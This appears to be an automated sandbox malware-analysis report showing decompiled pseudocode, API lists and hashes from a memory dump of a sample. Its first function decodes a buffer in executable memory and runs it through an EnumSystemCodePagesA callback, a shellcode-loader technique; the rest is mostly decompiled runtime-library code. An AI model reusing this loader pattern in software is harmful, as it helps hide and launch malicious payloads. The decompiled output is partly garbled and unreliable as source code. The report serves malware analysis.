                						 *(_t52 + _t54) =  *(_t52 + _t54) - 0x0000005b ^ 0x000000f3;
                						_t54 = _t54 + 1;
                					} while (_t54 < 0x12cb);
                					_t17 = EnumSystemCodePagesA(_t52, 0); // executed
                					if(_t17 == 0xe12f) {
                						_t45 = _t44 + 0xdb0e;
                						_pop(_t36);
                						_t37 =  !_t36;
                						if(( !_t17 ^ 0x0000cd45) != 0x6082) {
                							_t37 = 0xbc6b;
                							_t45 = _t45 - 1;
                						}
                						_pop(_t20);
                						_t23 = (_t20 & 0x000161dd) - 0xfffffffffffec5f9;
                						_t39 =  !(_t37 - 0xb1b2);
                						if(_t23 != 0xb7d3) {
                							_t23 = _t23 & 0x00010f24;
                							_t39 = _t39 + 0x158ad;
                						}
                						return _t23;
                					} else {
                						return _t17;
                					}
                				}
                			}



















                APIs
                • GetCommandLineW.KERNEL32(?), ref: 00EA100D
                • CommandLineToArgvW.SHELL32(00000000), ref: 00EA1014
                  • Part of subcall function 00EAE383: __wfsopen.LIBCMT ref: 00EAE38E
                • VirtualAlloc.KERNELBASE(00000000,1AD27480,00003000,00000004), ref: 00EA103E
                • _memset.LIBCMT ref: 00EA1053
                • VirtualAlloc.KERNELBASE(00000000,000012CB,00003000,00000040), ref: 00EA1068
                • __fread_nolock.LIBCMT ref: 00EA1076
                • EnumSystemCodePagesA.KERNEL32(00000000,00000000), ref: 00EA1090
                Memory Dump Source
                • Source File: 00000001.00000002.448099573.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000001.00000002.448093197.0000000000EA0000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448197888.0000000000EC7000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448222329.0000000000ECE000.00000004.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448230622.0000000000ED2000.00000002.00000001.01000000.00000004.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: AllocCommandLineVirtual$ArgvCodeEnumPagesSystem__fread_nolock__wfsopen_memset
                • String ID:
                • API String ID: 888471934-0
                • Opcode ID: da2a978dd0c744818f37d4d29d81790f40597e8ae17b832ad39eb6b5387bb87c
                • Instruction ID: d83b026c8da85a0b4bed6c30537d25b35a15405bc33636079891f410aac8a0ed
                • Opcode Fuzzy Hash: da2a978dd0c744818f37d4d29d81790f40597e8ae17b832ad39eb6b5387bb87c
                • Instruction Fuzzy Hash: BD2167775546003BF3241275EC8BFEB2A59D785308F090539F741FA1C1DAADB98242A8
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 87%
                			E00EA6B5A(void* __edx, void* __esi, void* __eflags) {
                				void* _t8;
                				void* _t9;
                				void* _t10;
                
                				_t9 = __esi;
                				_t8 = __edx;
                				asm("loopne 0xffffff8b");
                				if(__eflags != 0) {
                					E00EB0A4B();
                				} else {
                					if( *((intOrPtr*)(_t10 - 0x1c)) == 0) {
                						E00EB0ADE(__esi);
                					}
                					E00EB0A3C(_t8);
                				}
                				 *((intOrPtr*)(_t10 - 4)) = 0xfffffffe;
                				return E00EAF225(_t9);
                			}







                APIs
                Memory Dump Source
                • Source File: 00000001.00000002.448099573.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000001.00000002.448093197.0000000000EA0000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448197888.0000000000EC7000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448222329.0000000000ECE000.00000004.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448230622.0000000000ED2000.00000002.00000001.01000000.00000004.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: __amsg_exit$__cinit__wsetenvp__wwincmdln_doexit
                • String ID:
                • API String ID: 2587630013-0
                • Opcode ID: 344c1ff1ac66235cbc6626bc53989c47ba6ee416d5cb28026ab77ac35ced7a00
                • Instruction ID: d097b58567ac583a1fbb4bc13346af363cfbc39e784798e3def6faa5e6ee9351
                • Opcode Fuzzy Hash: 344c1ff1ac66235cbc6626bc53989c47ba6ee416d5cb28026ab77ac35ced7a00
                • Instruction Fuzzy Hash: EEF0C230A0031268DA2877B15C03BEF25C45F1B365F1438A5F805FE2C3DE58FA414266
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 54 eae4c2-eae4db 55 eae4f8 54->55 56 eae4dd-eae4e2 54->56 58 eae4fa-eae500 55->58 56->55 57 eae4e4-eae4e6 56->57 59 eae4e8-eae4ed call eaf100 57->59 60 eae501-eae506 57->60 71 eae4f3 call eaeb1e 59->71 62 eae508-eae512 60->62 63 eae514-eae518 60->63 62->63 65 eae538-eae547 62->65 66 eae51a-eae525 call eae740 63->66 67 eae528-eae52a 63->67 69 eae549-eae54c 65->69 70 eae54e 65->70 66->67 67->59 68 eae52c-eae536 67->68 68->59 68->65 73 eae553-eae558 69->73 70->73 71->55 76 eae55e-eae565 73->76 77 eae641-eae644 73->77 78 eae5a6-eae5a8 76->78 79 eae567-eae56f 76->79 77->58 81 eae5aa-eae5ac 78->81 82 eae612-eae613 call eaf572 78->82 79->78 80 eae571 79->80 86 eae66f 80->86 87 eae577-eae579 80->87 83 eae5ae-eae5b6 81->83 84 eae5d0-eae5db 81->84 90 eae618-eae61c 82->90 88 eae5b8-eae5c4 83->88 89 eae5c6-eae5ca 83->89 91 eae5df-eae5e2 84->91 92 eae5dd 84->92 95 eae673-eae67c 86->95 93 eae57b-eae57d 87->93 94 eae580-eae585 87->94 96 eae5cc-eae5ce 88->96 89->96 90->95 97 eae61e-eae623 90->97 98 eae649-eae64d 91->98 99 eae5e4-eae5f0 call eaf693 call eaf84a 91->99 92->91 93->94 94->98 100 eae58b-eae5a4 call eaf6b7 94->100 95->58 96->91 97->98 101 eae625-eae636 97->101 102 eae65f-eae66a call eaf100 98->102 103 eae64f-eae65c call eae740 98->103 115 eae5f5-eae5fa 99->115 114 eae607-eae610 100->114 106 eae639-eae63b 101->106 102->71 103->102 106->76 106->77 114->106 116 eae600-eae603 115->116 117 eae681-eae685 115->117 116->86 118 eae605 116->118 117->95 118->114
                C-Code - Quality: 71%
                			E00EAE4C2(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
                				char* _v8;
                				signed int _v12;
                				signed int _v16;
                				signed int _v20;
                				void* __ebx;
                				void* __esi;
                				signed int _t74;
                				signed int _t78;
                				char _t81;
                				signed int _t86;
                				signed int _t88;
                				signed int _t91;
                				signed int _t94;
                				signed int _t97;
                				signed int _t98;
                				char* _t99;
                				signed int _t100;
                				signed int _t102;
                				signed int _t103;
                				signed int _t104;
                				char* _t110;
                				signed int _t113;
                				signed int _t117;
                				signed int _t119;
                				void* _t120;
                
                				_t99 = _a4;
                				_t74 = _a8;
                				_v8 = _t99;
                				_v12 = _t74;
                				if(_a12 == 0) {
                					L5:
                					return 0;
                				}
                				_t97 = _a16;
                				if(_t97 == 0) {
                					goto L5;
                				}
                				if(_t99 != 0) {
                					_t119 = _a20;
                					__eflags = _t119;
                					if(_t119 == 0) {
                						L9:
                						__eflags = _a8 - 0xffffffff;
                						if(_a8 != 0xffffffff) {
                							_t74 = E00EAE740(_t99, 0, _a8);
                							_t120 = _t120 + 0xc;
                						}
                						__eflags = _t119;
                						if(_t119 == 0) {
                							goto L3;
                						} else {
                							_t78 = _t74 | 0xffffffff;
                							__eflags = _t97 - _t78 / _a12;
                							if(_t97 > _t78 / _a12) {
                								goto L3;
                							}
                							L13:
                							_t117 = _a12 * _t97;
                							__eflags =  *(_t119 + 0xc) & 0x0000010c;
                							_t98 = _t117;
                							if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
                								_t100 = 0x1000;
                							} else {
                								_t100 =  *(_t119 + 0x18);
                							}
                							_v16 = _t100;
                							__eflags = _t117;
                							if(_t117 == 0) {
                								L41:
                								return _a16;
                							} else {
                								do {
                									__eflags =  *(_t119 + 0xc) & 0x0000010c;
                									if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
                										L24:
                										__eflags = _t98 - _t100;
                										if(_t98 < _t100) {
                											_t81 = E00EAF572(_t98, _t100, _t119, _t119); // executed
                											__eflags = _t81 - 0xffffffff;
                											if(_t81 == 0xffffffff) {
                												L46:
                												return (_t117 - _t98) / _a12;
                											}
                											_t102 = _v12;
                											__eflags = _t102;
                											if(_t102 == 0) {
                												L42:
                												__eflags = _a8 - 0xffffffff;
                												if(_a8 != 0xffffffff) {
                													E00EAE740(_a4, 0, _a8);
                												}
                												 *((intOrPtr*)(E00EAF100())) = 0x22;
                												L4:
                												E00EAEB1E();
                												goto L5;
                											}
                											_t110 = _v8;
                											 *_t110 = _t81;
                											_t98 = _t98 - 1;
                											_v8 = _t110 + 1;
                											_t103 = _t102 - 1;
                											__eflags = _t103;
                											_v12 = _t103;
                											_t100 =  *(_t119 + 0x18);
                											_v16 = _t100;
                											goto L40;
                										}
                										__eflags = _t100;
                										if(_t100 == 0) {
                											_t86 = 0x7fffffff;
                											__eflags = _t98 - 0x7fffffff;
                											if(_t98 <= 0x7fffffff) {
                												_t86 = _t98;
                											}
                										} else {
                											__eflags = _t98 - 0x7fffffff;
                											if(_t98 <= 0x7fffffff) {
                												_t44 = _t98 % _t100;
                												__eflags = _t44;
                												_t113 = _t44;
                												_t91 = _t98;
                											} else {
                												_t113 = 0x7fffffff % _t100;
                												_t91 = 0x7fffffff;
                											}
                											_t86 = _t91 - _t113;
                										}
                										__eflags = _t86 - _v12;
                										if(_t86 > _v12) {
                											goto L42;
                										} else {
                											_push(_t86);
                											_push(_v8);
                											_push(E00EAF693(_t119)); // executed
                											_t88 = E00EAF84A(); // executed
                											_t120 = _t120 + 0xc;
                											__eflags = _t88;
                											if(_t88 == 0) {
                												 *(_t119 + 0xc) =  *(_t119 + 0xc) | 0x00000010;
                												goto L46;
                											}
                											__eflags = _t88 - 0xffffffff;
                											if(_t88 == 0xffffffff) {
                												L45:
                												_t64 = _t119 + 0xc;
                												 *_t64 =  *(_t119 + 0xc) | 0x00000020;
                												__eflags =  *_t64;
                												goto L46;
                											}
                											_t98 = _t98 - _t88;
                											__eflags = _t98;
                											L36:
                											_v8 = _v8 + _t88;
                											_v12 = _v12 - _t88;
                											_t100 = _v16;
                											goto L40;
                										}
                									}
                									_t94 =  *(_t119 + 4);
                									_v20 = _t94;
                									__eflags = _t94;
                									if(__eflags == 0) {
                										goto L24;
                									}
                									if(__eflags < 0) {
                										goto L45;
                									}
                									__eflags = _t98 - _t94;
                									if(_t98 < _t94) {
                										_t94 = _t98;
                										_v20 = _t98;
                									}
                									_t104 = _v12;
                									__eflags = _t94 - _t104;
                									if(_t94 > _t104) {
                										goto L42;
                									} else {
                										E00EAF6B7(_v8, _t104,  *_t119, _t94);
                										_t88 = _v20;
                										_t120 = _t120 + 0x10;
                										 *(_t119 + 4) =  *(_t119 + 4) - _t88;
                										_t98 = _t98 - _t88;
                										 *_t119 =  *_t119 + _t88;
                										goto L36;
                									}
                									L40:
                									__eflags = _t98;
                								} while (_t98 != 0);
                								goto L41;
                							}
                						}
                					}
                					_t74 = (_t74 | 0xffffffff) / _a12;
                					__eflags = _t97 - _t74;
                					if(_t97 <= _t74) {
                						goto L13;
                					}
                					goto L9;
                				}
                				L3:
                				 *((intOrPtr*)(E00EAF100())) = 0x16;
                				goto L4;
                			}





























                APIs
                Memory Dump Source
                • Source File: 00000001.00000002.448099573.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000001.00000002.448093197.0000000000EA0000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448197888.0000000000EC7000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448222329.0000000000ECE000.00000004.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448230622.0000000000ED2000.00000002.00000001.01000000.00000004.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                • String ID:
                • API String ID: 1559183368-0
                • Opcode ID: 97b1a77f0ae4b1df62b12297501d80c3b73afd724fa93faeaa3cde44aa4959b6
                • Instruction ID: 8e7d763c938ff3aabbd027699c607b274108f893b075d8a543be975250439fd3
                • Opcode Fuzzy Hash: 97b1a77f0ae4b1df62b12297501d80c3b73afd724fa93faeaa3cde44aa4959b6
                • Instruction Fuzzy Hash: 1051B830E003059BDB289FA998845AE77A5AF5E328F149729F435BE3D0E770BD509B50
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 119 eae6a2-eae6b6 call eaf1e0 122 eae6b8-eae6bb 119->122 123 eae6e9 119->123 122->123 125 eae6bd-eae6c2 122->125 124 eae6eb-eae6f0 call eaf225 123->124 127 eae6f1-eae708 call eaec39 call eae4c2 125->127 128 eae6c4-eae6c8 125->128 140 eae70d-eae723 call eae72b 127->140 129 eae6ca-eae6d6 call eae740 128->129 130 eae6d9-eae6e4 call eaf100 call eaeb1e 128->130 129->130 130->123 140->124
                C-Code - Quality: 89%
                			E00EAE6A2(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                				intOrPtr _t16;
                				intOrPtr _t19;
                				intOrPtr _t29;
                				void* _t32;
                
                				_push(0xc);
                				_push(0xecc0b0);
                				E00EAF1E0(__ebx, __edi, __esi);
                				 *((intOrPtr*)(_t32 - 0x1c)) = 0;
                				if( *((intOrPtr*)(_t32 + 0x10)) == 0 ||  *((intOrPtr*)(_t32 + 0x14)) == 0) {
                					L6:
                					_t16 = 0;
                				} else {
                					_t31 =  *((intOrPtr*)(_t32 + 0x18));
                					if( *((intOrPtr*)(_t32 + 0x18)) != 0) {
                						E00EAEC39(_t31);
                						 *((intOrPtr*)(_t32 - 4)) = 0;
                						_t19 = E00EAE4C2( *((intOrPtr*)(_t32 + 8)),  *((intOrPtr*)(_t32 + 0xc)),  *((intOrPtr*)(_t32 + 0x10)),  *((intOrPtr*)(_t32 + 0x14)), _t31); // executed
                						_t29 = _t19;
                						 *((intOrPtr*)(_t32 - 0x1c)) = _t29;
                						 *((intOrPtr*)(_t32 - 4)) = 0xfffffffe;
                						E00EAE72B(_t31);
                						_t16 = _t29;
                					} else {
                						if( *((intOrPtr*)(_t32 + 0xc)) != 0xffffffff) {
                							E00EAE740( *((intOrPtr*)(_t32 + 8)), 0,  *((intOrPtr*)(_t32 + 0xc)));
                						}
                						 *((intOrPtr*)(E00EAF100())) = 0x16;
                						E00EAEB1E();
                						goto L6;
                					}
                				}
                				return E00EAF225(_t16);
                			}








                APIs
                Memory Dump Source
                • Source File: 00000001.00000002.448099573.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000001.00000002.448093197.0000000000EA0000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448197888.0000000000EC7000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448222329.0000000000ECE000.00000004.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448230622.0000000000ED2000.00000002.00000001.01000000.00000004.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: __lock_file_memset
                • String ID:
                • API String ID: 26237723-0
                • Opcode ID: 470dfcb0839a150af0b0cea2206ee62485d3122d3d0d51621fcfa8676eab17ef
                • Instruction ID: 4a0b97bab2639f33b7b9b5d401ce297b9ca3f698b35f2fda6f13a8c244a08545
                • Opcode Fuzzy Hash: 470dfcb0839a150af0b0cea2206ee62485d3122d3d0d51621fcfa8676eab17ef
                • Instruction Fuzzy Hash: BE01D031800605EBCF11AFA5DC0299E7BE1AF9A360F149515F4143F391D7759A11DF91
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 143 eae383-eae397 call eae3dd
                C-Code - Quality: 25%
                			E00EAE383(intOrPtr _a4, intOrPtr _a8) {
                				void* __ebp;
                				void* _t3;
                				void* _t4;
                				void* _t5;
                				void* _t6;
                				void* _t9;
                
                				_push(0x40);
                				_push(_a8);
                				_push(_a4);
                				_t3 = E00EAE3DD(_t4, _t5, _t6, _t9); // executed
                				return _t3;
                			}










                APIs
                Memory Dump Source
                • Source File: 00000001.00000002.448099573.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000001.00000002.448093197.0000000000EA0000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448197888.0000000000EC7000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448222329.0000000000ECE000.00000004.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448230622.0000000000ED2000.00000002.00000001.01000000.00000004.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: __wfsopen
                • String ID:
                • API String ID: 197181222-0
                • Opcode ID: a3c3897a0b8e5cc1e99c40f009d05ddfac5da0d01180f44d34b11c30565e0d74
                • Instruction ID: 53ea4ac7243d679f710a9bd4333b347f0f2c145413b2a47b2ef55c5477527194
                • Opcode Fuzzy Hash: a3c3897a0b8e5cc1e99c40f009d05ddfac5da0d01180f44d34b11c30565e0d74
                • Instruction Fuzzy Hash: 6FB0927244020C77DE012A82EC02A593B9A9B45660F408060FB0C2D261A6B3B6649689
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 92%
                			E00EA4194(intOrPtr* __eax, void* __edx, void* __edi, signed int __esi) {
                				void* __ebx;
                				signed int _t268;
                				void* _t269;
                				signed int _t275;
                				signed int _t276;
                				signed int _t277;
                				signed int _t278;
                				signed int _t279;
                				signed int _t280;
                				signed int _t281;
                				signed int _t282;
                				signed int _t283;
                				signed int _t284;
                				signed int _t285;
                				signed int _t286;
                				signed int _t287;
                				signed int _t288;
                				signed int _t289;
                				signed int _t290;
                				signed int _t291;
                				signed int _t292;
                				signed int _t293;
                				signed int _t294;
                				signed int _t295;
                				signed int _t296;
                				signed int _t297;
                				signed int _t298;
                				signed int _t299;
                				signed int _t300;
                				signed int _t301;
                				signed int _t302;
                				signed int _t303;
                				signed int _t304;
                				signed int _t305;
                				signed int _t306;
                				signed int _t307;
                				signed int _t308;
                				signed int _t309;
                				signed int _t310;
                				signed int _t311;
                				signed int _t312;
                				signed int _t313;
                				signed int _t314;
                				signed int _t315;
                				signed int _t316;
                				signed int _t317;
                				signed int _t318;
                				signed int _t319;
                				signed int _t320;
                				signed int _t321;
                				signed int _t322;
                				signed int _t323;
                				signed int _t324;
                				signed int _t325;
                				signed int _t326;
                				void* _t328;
                
                				 *__eax =  *__eax + __eax;
                				 *((intOrPtr*)(__eax + 0x6a)) =  *((intOrPtr*)(__eax + 0x6a)) + __edx;
                				_push(_t269);
                				_push(1);
                				_push(_t328 - 8);
                				_t275 = __esi | E00EB4CB1(_t269, __edi, __esi);
                				_t276 = _t275 | E00EB4CB1(_t269, __edi, _t275, _t328 - 8, 1, _t269, 0x41, __edi + 0x8c);
                				_t277 = _t276 | E00EB4CB1(_t269, __edi, _t276, _t328 - 8, 1, _t269, 0x42, __edi + 0x90);
                				_t278 = _t277 | E00EB4CB1(_t269, __edi, _t277, _t328 - 8, 1, _t269, 0x43, __edi + 0x94);
                				_t279 = _t278 | E00EB4CB1(_t269, __edi, _t278, _t328 - 8, 1, _t269, 0x28, __edi + 0x98);
                				_t280 = _t279 | E00EB4CB1(_t269, __edi, _t279, _t328 - 8, 1, _t269, 0x29, __edi + 0x9c);
                				_t281 = _t280 | E00EB4CB1(_t269, __edi, _t280, _t328 - 8, 1, _t269, 0x1f, __edi + 0xa0);
                				_t282 = _t281 | E00EB4CB1(_t269, __edi, _t281, _t328 - 8, 1, _t269, 0x20, __edi + 0xa4);
                				_t283 = _t282 | E00EB4CB1(_t269, __edi, _t282, _t328 - 8, 1, _t269, 0x1003, __edi + 0xa8);
                				_t284 = _t283 | E00EB4CB1(_t269, __edi, _t283, _t328 - 8, 0, _t269, 0x1009, __edi + 0xac);
                				_t285 = _t284 | E00EB4CB1(_t269, __edi, _t284, _t328 - 8, 2, _t269, 0x31, __edi + 0xb8);
                				_t286 = _t285 | E00EB4CB1(_t269, __edi, _t285, _t328 - 8, 2, _t269, 0x32, __edi + 0xbc);
                				_t287 = _t286 | E00EB4CB1(_t269, __edi, _t286, _t328 - 8, 2, _t269, 0x33, __edi + 0xc0);
                				_t288 = _t287 | E00EB4CB1(_t269, __edi, _t287, _t328 - 8, 2, _t269, 0x34, __edi + 0xc4);
                				_t289 = _t288 | E00EB4CB1(_t269, __edi, _t288, _t328 - 8, 2, _t269, 0x35, __edi + 0xc8);
                				_t290 = _t289 | E00EB4CB1(_t269, __edi, _t289, _t328 - 8, 2, _t269, 0x36, __edi + 0xcc);
                				_t291 = _t290 | E00EB4CB1(_t269, __edi, _t290, _t328 - 8, 2, _t269, 0x37, __edi + 0xb4);
                				_t292 = _t291 | E00EB4CB1(_t269, __edi, _t291, _t328 - 8, 2, _t269, 0x2a, __edi + 0xd4);
                				_t293 = _t292 | E00EB4CB1(_t269, __edi, _t292, _t328 - 8, 2, _t269, 0x2b, __edi + 0xd8);
                				_t294 = _t293 | E00EB4CB1(_t269, __edi, _t293, _t328 - 8, 2, _t269, 0x2c, __edi + 0xdc);
                				_t295 = _t294 | E00EB4CB1(_t269, __edi, _t294, _t328 - 8, 2, _t269, 0x2d, __edi + 0xe0);
                				_t296 = _t295 | E00EB4CB1(_t269, __edi, _t295, _t328 - 8, 2, _t269, 0x2e, __edi + 0xe4);
                				_t297 = _t296 | E00EB4CB1(_t269, __edi, _t296, _t328 - 8, 2, _t269, 0x2f, __edi + 0xe8);
                				_t298 = _t297 | E00EB4CB1(_t269, __edi, _t297, _t328 - 8, 2, _t269, 0x30, __edi + 0xd0);
                				_t299 = _t298 | E00EB4CB1(_t269, __edi, _t298, _t328 - 8, 2, _t269, 0x44, __edi + 0xec);
                				_t300 = _t299 | E00EB4CB1(_t269, __edi, _t299, _t328 - 8, 2, _t269, 0x45, __edi + 0xf0);
                				_t301 = _t300 | E00EB4CB1(_t269, __edi, _t300, _t328 - 8, 2, _t269, 0x46, __edi + 0xf4);
                				_t302 = _t301 | E00EB4CB1(_t269, __edi, _t301, _t328 - 8, 2, _t269, 0x47, __edi + 0xf8);
                				_t303 = _t302 | E00EB4CB1(_t269, __edi, _t302, _t328 - 8, 2, _t269, 0x48, __edi + 0xfc);
                				_t304 = _t303 | E00EB4CB1(_t269, __edi, _t303, _t328 - 8, 2, _t269, 0x49, __edi + 0x100);
                				_t305 = _t304 | E00EB4CB1(_t269, __edi, _t304, _t328 - 8, 2, _t269, 0x4a, __edi + 0x104);
                				_t306 = _t305 | E00EB4CB1(_t269, __edi, _t305, _t328 - 8, 2, _t269, 0x4b, __edi + 0x108);
                				_t307 = _t306 | E00EB4CB1(_t269, __edi, _t306, _t328 - 8, 2, _t269, 0x4c, __edi + 0x10c);
                				_t308 = _t307 | E00EB4CB1(_t269, __edi, _t307, _t328 - 8, 2, _t269, 0x4d, __edi + 0x110);
                				_t309 = _t308 | E00EB4CB1(_t269, __edi, _t308, _t328 - 8, 2, _t269, 0x4e, __edi + 0x114);
                				_t310 = _t309 | E00EB4CB1(_t269, __edi, _t309, _t328 - 8, 2, _t269, 0x4f, __edi + 0x118);
                				_t311 = _t310 | E00EB4CB1(_t269, __edi, _t310, _t328 - 8, 2, _t269, 0x38, __edi + 0x11c);
                				_t312 = _t311 | E00EB4CB1(_t269, __edi, _t311, _t328 - 8, 2, _t269, 0x39, __edi + 0x120);
                				_t313 = _t312 | E00EB4CB1(_t269, __edi, _t312, _t328 - 8, 2, _t269, 0x3a, __edi + 0x124);
                				_t314 = _t313 | E00EB4CB1(_t269, __edi, _t313, _t328 - 8, 2, _t269, 0x3b, __edi + 0x128);
                				_t315 = _t314 | E00EB4CB1(_t269, __edi, _t314, _t328 - 8, 2, _t269, 0x3c, __edi + 0x12c);
                				_t316 = _t315 | E00EB4CB1(_t269, __edi, _t315, _t328 - 8, 2, _t269, 0x3d, __edi + 0x130);
                				_t317 = _t316 | E00EB4CB1(_t269, __edi, _t316, _t328 - 8, 2, _t269, 0x3e, __edi + 0x134);
                				_t318 = _t317 | E00EB4CB1(_t269, __edi, _t317, _t328 - 8, 2, _t269, 0x3f, __edi + 0x138);
                				_t319 = _t318 | E00EB4CB1(_t269, __edi, _t318, _t328 - 8, 2, _t269, 0x40, __edi + 0x13c);
                				_t320 = _t319 | E00EB4CB1(_t269, __edi, _t319, _t328 - 8, 2, _t269, 0x41, __edi + 0x140);
                				_t321 = _t320 | E00EB4CB1(_t269, __edi, _t320, _t328 - 8, 2, _t269, 0x42, __edi + 0x144);
                				_t322 = _t321 | E00EB4CB1(_t269, __edi, _t321, _t328 - 8, 2, _t269, 0x43, __edi + 0x148);
                				_t323 = _t322 | E00EB4CB1(_t269, __edi, _t322, _t328 - 8, 2, _t269, 0x28, __edi + 0x14c);
                				_t324 = _t323 | E00EB4CB1(_t269, __edi, _t323, _t328 - 8, 2, _t269, 0x29, __edi + 0x150);
                				_t325 = _t324 | E00EB4CB1(_t269, __edi, _t324, _t328 - 8, 2, _t269, 0x1f, __edi + 0x154);
                				_t326 = _t325 | E00EB4CB1(_t269, __edi, _t325, _t328 - 8, 2, _t269, 0x20, __edi + 0x158);
                				_t268 = E00EB4CB1(_t269, __edi, _t326, _t328 - 8, 2, _t269, 0x1003, __edi + 0x15c) | _t326;
                				return _t268;
                			}

                APIs
                • ___getlocaleinfo.LIBCMT ref: 00EB92A9
                  • Part of subcall function 00EB4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 00EB4D03
                  • Part of subcall function 00EB4CB1: GetLastError.KERNEL32 ref: 00EB4D15
                  • Part of subcall function 00EB4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 00EB4D35
                  • Part of subcall function 00EB4CB1: __calloc_crt.LIBCMT ref: 00EB4D4A
                  • Part of subcall function 00EB4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 00EB4D77
                  • Part of subcall function 00EB4CB1: __calloc_crt.LIBCMT ref: 00EB4D8C
                  • Part of subcall function 00EB4CB1: _free.LIBCMT ref: 00EB4DA4
                • ___getlocaleinfo.LIBCMT ref: 00EB92C3
                  • Part of subcall function 00EB4CB1: _free.LIBCMT ref: 00EB4DE4
                  • Part of subcall function 00EB4CB1: __calloc_crt.LIBCMT ref: 00EB4E0E
                  • Part of subcall function 00EB4CB1: _free.LIBCMT ref: 00EB4E34
                  • Part of subcall function 00EB4CB1: __invoke_watson.LIBCMT ref: 00EB4E84
                • ___getlocaleinfo.LIBCMT ref: 00EB92DA
                • ___getlocaleinfo.LIBCMT ref: 00EB92F1
                • ___getlocaleinfo.LIBCMT ref: 00EB9308
                • ___getlocaleinfo.LIBCMT ref: 00EB9322
                • ___getlocaleinfo.LIBCMT ref: 00EB9339
                • ___getlocaleinfo.LIBCMT ref: 00EB9350
                • ___getlocaleinfo.LIBCMT ref: 00EB936A
                • ___getlocaleinfo.LIBCMT ref: 00EB9387
                • ___getlocaleinfo.LIBCMT ref: 00EB939E
                • ___getlocaleinfo.LIBCMT ref: 00EB93B5
                • ___getlocaleinfo.LIBCMT ref: 00EB93CC
                • ___getlocaleinfo.LIBCMT ref: 00EB93E6
                • ___getlocaleinfo.LIBCMT ref: 00EB93FD
                • ___getlocaleinfo.LIBCMT ref: 00EB9414
                • ___getlocaleinfo.LIBCMT ref: 00EB942B
                • ___getlocaleinfo.LIBCMT ref: 00EB9445
                • ___getlocaleinfo.LIBCMT ref: 00EB945C
                • ___getlocaleinfo.LIBCMT ref: 00EB9473
                • ___getlocaleinfo.LIBCMT ref: 00EB948A
                • ___getlocaleinfo.LIBCMT ref: 00EB94A4
                • ___getlocaleinfo.LIBCMT ref: 00EB94BB
                • ___getlocaleinfo.LIBCMT ref: 00EB94D2
                • ___getlocaleinfo.LIBCMT ref: 00EB94E9
                • ___getlocaleinfo.LIBCMT ref: 00EB9503
                • ___getlocaleinfo.LIBCMT ref: 00EB951A
                • ___getlocaleinfo.LIBCMT ref: 00EB9531
                • ___getlocaleinfo.LIBCMT ref: 00EB9548
                • ___getlocaleinfo.LIBCMT ref: 00EB9562
                • ___getlocaleinfo.LIBCMT ref: 00EB9579
                • ___getlocaleinfo.LIBCMT ref: 00EB9590
                • ___getlocaleinfo.LIBCMT ref: 00EB95A7
                • ___getlocaleinfo.LIBCMT ref: 00EB95C1
                • ___getlocaleinfo.LIBCMT ref: 00EB95D8
                • ___getlocaleinfo.LIBCMT ref: 00EB95EF
                • ___getlocaleinfo.LIBCMT ref: 00EB9606
                • ___getlocaleinfo.LIBCMT ref: 00EB9620
                • ___getlocaleinfo.LIBCMT ref: 00EB9637
                • ___getlocaleinfo.LIBCMT ref: 00EB964E
                • ___getlocaleinfo.LIBCMT ref: 00EB9665
                • ___getlocaleinfo.LIBCMT ref: 00EB967F
                • ___getlocaleinfo.LIBCMT ref: 00EB9696
                • ___getlocaleinfo.LIBCMT ref: 00EB96AD
                • ___getlocaleinfo.LIBCMT ref: 00EB96C4
                • ___getlocaleinfo.LIBCMT ref: 00EB96DE
